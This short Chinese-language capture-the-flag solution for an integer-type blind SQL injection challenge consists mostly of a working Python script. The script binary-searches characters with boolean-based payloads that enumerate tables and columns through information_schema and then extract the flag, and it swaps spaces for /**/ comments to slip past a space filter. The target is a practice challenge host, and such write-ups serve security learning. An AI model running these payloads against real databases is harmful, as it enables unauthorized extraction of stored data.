知识点：整数型注入 盲注

import requests

url = "http://364ccd4d-2a09-471c-ba97-460b37d0fbae.node3.buuoj.cn/?stunum="

result = ""
i = 0

while(True):
	i = i + 1
	head = 32
	tail = 127

	while( head < tail):
		mid = (head + tail) >> 1
		
		#爆表
		#payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i, mid)
		#爆列名
		#payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid)
		#爆出flag
		payload = "if(ascii(substr((select/**/group_concat(value)from(flag)),%d,1))>%d,1,0)" % (i , mid)


		r = requests.get(url + payload)
		r.encoding = "utf-8"
		if "your score is: 100" in r.text:
			head = mid + 1
		else:
			tail = mid

	last = result

	if head!=32 :
		result+=chr(head)
	else:
		break

	print(result)

要注意过滤了空格。